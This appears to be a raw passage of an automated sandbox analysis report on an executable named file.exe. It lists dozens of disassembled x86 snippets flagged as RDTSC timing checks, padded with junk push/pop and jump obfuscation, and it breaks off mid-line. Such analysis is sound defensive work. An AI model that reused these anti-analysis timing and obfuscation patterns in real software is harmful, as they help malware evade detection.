Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7470 second address: 4C7511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F8B146BCD58h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 sub edi, dword ptr [ebp+122D29A1h] 0x00000028 push 00000003h 0x0000002a mov cl, C0h 0x0000002c push 00000000h 0x0000002e je 00007F8B146BCD5Ch 0x00000034 and esi, dword ptr [ebp+122D2891h] 0x0000003a push 00000003h 0x0000003c call 00007F8B146BCD60h 0x00000041 mov dword ptr [ebp+122D1860h], eax 0x00000047 pop esi 0x00000048 mov dword ptr [ebp+122D185Ah], ecx 0x0000004e push 8D582125h 0x00000053 ja 00007F8B146BCD5Eh 0x00000059 add dword ptr [esp], 32A7DEDBh 0x00000060 mov esi, 1419A800h 0x00000065 lea ebx, dword ptr [ebp+12459175h] 0x0000006b cld 0x0000006c xchg eax, ebx 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007F8B146BCD67h 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7511 second address: 4C7522 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7574 second address: 4C7582 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7582 second address: 4C7588 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7588 second address: 4C7656 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8B146BCD69h 0x00000008 jnl 00007F8B146BCD56h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 jl 00007F8B146BCD5Bh 0x00000018 push 00000000h 0x0000001a mov di, ax 0x0000001d call 00007F8B146BCD59h 0x00000022 jnp 00007F8B146BCD63h 0x00000028 push eax 0x00000029 pushad 0x0000002a jnp 00007F8B146BCD6Ch 0x00000030 pushad 0x00000031 jmp 00007F8B146BCD66h 0x00000036 push eax 0x00000037 pop eax 0x00000038 popad 0x00000039 popad 0x0000003a mov eax, dword ptr [esp+04h] 0x0000003e pushad 0x0000003f jmp 00007F8B146BCD5Dh 0x00000044 je 00007F8B146BCD58h 0x0000004a push eax 0x0000004b pop eax 0x0000004c popad 0x0000004d mov eax, dword ptr [eax] 0x0000004f pushad 0x00000050 push edx 0x00000051 push edx 0x00000052 pop edx 0x00000053 pop edx 0x00000054 pushad 0x00000055 pushad 0x00000056 popad 0x00000057 jmp 00007F8B146BCD62h 0x0000005c popad 0x0000005d popad 0x0000005e mov dword ptr [esp+04h], eax 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 push edx 0x00000067 pop edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7656 second address: 4C766C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B150D74F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C766C second address: 4C7706 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F8B146BCD58h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 call 00007F8B146BCD5Fh 0x00000028 mov dword ptr [ebp+122D1ADDh], esi 0x0000002e pop ecx 0x0000002f push 00000003h 0x00000031 mov edi, dword ptr [ebp+122D28C5h] 0x00000037 push 00000000h 0x00000039 jmp 00007F8B146BCD66h 0x0000003e push 00000003h 0x00000040 jmp 00007F8B146BCD5Eh 0x00000045 call 00007F8B146BCD59h 0x0000004a jmp 00007F8B146BCD5Ah 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 pushad 0x00000054 popad 0x00000055 jmp 00007F8B146BCD5Eh 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7706 second address: 4C7710 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F8B150D74E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7710 second address: 4C7791 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8B146BCD56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jbe 00007F8B146BCD69h 0x00000016 jmp 00007F8B146BCD63h 0x0000001b mov eax, dword ptr [eax] 0x0000001d jc 00007F8B146BCD5Ah 0x00000023 push eax 0x00000024 pushad 0x00000025 popad 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b pushad 0x0000002c push eax 0x0000002d jp 00007F8B146BCD56h 0x00000033 pop eax 0x00000034 jmp 00007F8B146BCD67h 0x00000039 popad 0x0000003a pop eax 0x0000003b sub dword ptr [ebp+122D219Ah], edi 0x00000041 mov ecx, 7AAF27B9h 0x00000046 lea ebx, dword ptr [ebp+12459180h] 0x0000004c sbb edi, 5252CCF0h 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F8B146BCD5Ch 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E8869 second address: 4E886F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E886F second address: 4E8873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E8873 second address: 4E8879 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E8879 second address: 4E889F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jg 00007F8B146BCD56h 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8B146BCD66h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E889F second address: 4E88A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E88A5 second address: 4E88A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E88A9 second address: 4E88C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B150D74F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E88C2 second address: 4E88C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E88C8 second address: 4E88CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E66BC second address: 4E66CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146BCD5Bh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E66CE second address: 4E66D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E685E second address: 4E6878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 jmp 00007F8B146BCD5Eh 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E6B36 second address: 4E6B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B150D74F0h 0x00000009 je 00007F8B150D74E6h 0x0000000f popad 0x00000010 jmp 00007F8B150D74EEh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E6B5F second address: 4E6B67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E6B67 second address: 4E6B7C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8B150D74E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F8B150D750Ah 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E6B7C second address: 4E6B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E6CF6 second address: 4E6D13 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8B150D74F0h 0x00000008 jmp 00007F8B150D74EAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jbe 00007F8B150D7508h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E6D13 second address: 4E6D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E6FF4 second address: 4E6FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E716B second address: 4E7179 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F8B146BCD5Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E72FA second address: 4E730F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8B150D74ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E730F second address: 4E7313 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF1A2 second address: 4AF1AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF1AA second address: 4AF1CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B146BCD65h 0x00000009 popad 0x0000000a jc 00007F8B146BCD5Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF1CC second address: 4AF1D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E8224 second address: 4E8261 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8B146BCD56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007F8B146BCD62h 0x00000010 pop esi 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F8B146BCD5Ch 0x0000001b jmp 00007F8B146BCD5Eh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E8261 second address: 4E8271 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F8B150D74EAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E83F3 second address: 4E83F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E83F7 second address: 4E840E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B150D74EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E840E second address: 4E8414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E8414 second address: 4E8419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED7F1 second address: 4ED7F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED7F7 second address: 4ED7FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED7FB second address: 4ED826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jnp 00007F8B146BCD64h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jnc 00007F8B146BCD5Eh 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0A4 second address: 4EC0A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC809 second address: 4EC813 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8B146BCD5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED8FA second address: 4ED900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED900 second address: 4ED906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F440E second address: 4F4414 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F4414 second address: 4F444F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F8B146BCD60h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F8B146BCD71h 0x00000015 jmp 00007F8B146BCD60h 0x0000001a jmp 00007F8B146BCD5Bh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F444F second address: 4F4467 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8B150D74ECh 0x00000008 jp 00007F8B150D74E6h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 jbe 00007F8B150D74E6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F3AE8 second address: 4F3B03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146BCD65h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F3C8A second address: 4F3CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 jno 00007F8B150D74E6h 0x0000000b jmp 00007F8B150D74F3h 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F410B second address: 4F410F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F410F second address: 4F4115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F4115 second address: 4F4121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F4121 second address: 4F413D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B150D74F8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F413D second address: 4F4162 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146BCD63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F8B146BCD5Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F42B0 second address: 4F42C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F8B150D74EDh 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F61EB second address: 4F61EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6282 second address: 4F62A7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F8B150D74F1h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F8B150D74E8h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F62A7 second address: 4F62AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F62AD second address: 4F62B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F62B1 second address: 4F62C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F62C1 second address: 4F62C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F62C5 second address: 4F62CF instructions: 0x00000000 rdtsc 0x00000002 js 00007F8B146BCD56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F62CF second address: 4F62D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F62D5 second address: 4F62D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F62D9 second address: 4F6320 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B150D74EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F8B150D74F8h 0x00000014 pop eax 0x00000015 mov edi, ebx 0x00000017 call 00007F8B150D74E9h 0x0000001c push eax 0x0000001d push edx 0x0000001e je 00007F8B150D74ECh 0x00000024 jl 00007F8B150D74E6h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6320 second address: 4F6369 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146BCD62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b ja 00007F8B146BCD69h 0x00000011 pop eax 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 ja 00007F8B146BCD5Ch 0x0000001c mov eax, dword ptr [eax] 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push edi 0x00000022 pop edi 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F67FA second address: 4F67FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F67FE second address: 4F6804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F68C0 second address: 4F68C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6A16 second address: 4F6A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6A1A second address: 4F6A20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6FAF second address: 4F6FB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6FB3 second address: 4F6FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6FB9 second address: 4F6FBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F7058 second address: 4F705C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F705C second address: 4F7062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F7433 second address: 4F7437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F7437 second address: 4F7467 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F8B146BCD64h 0x0000000e pushad 0x0000000f jmp 00007F8B146BCD60h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F762F second address: 4F7635 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F7635 second address: 4F763B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F8B56 second address: 4F8B5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90F4 second address: 4F9163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 jmp 00007F8B146BCD5Eh 0x0000000e pop ecx 0x0000000f nop 0x00000010 pushad 0x00000011 mov ebx, dword ptr [ebp+122D282Dh] 0x00000017 jg 00007F8B146BCD5Ah 0x0000001d popad 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007F8B146BCD58h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 0000001Ah 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a mov edi, dword ptr [ebp+122D2B31h] 0x00000040 push 00000000h 0x00000042 mov esi, 31BE0061h 0x00000047 jl 00007F8B146BCD5Ch 0x0000004d sub esi, dword ptr 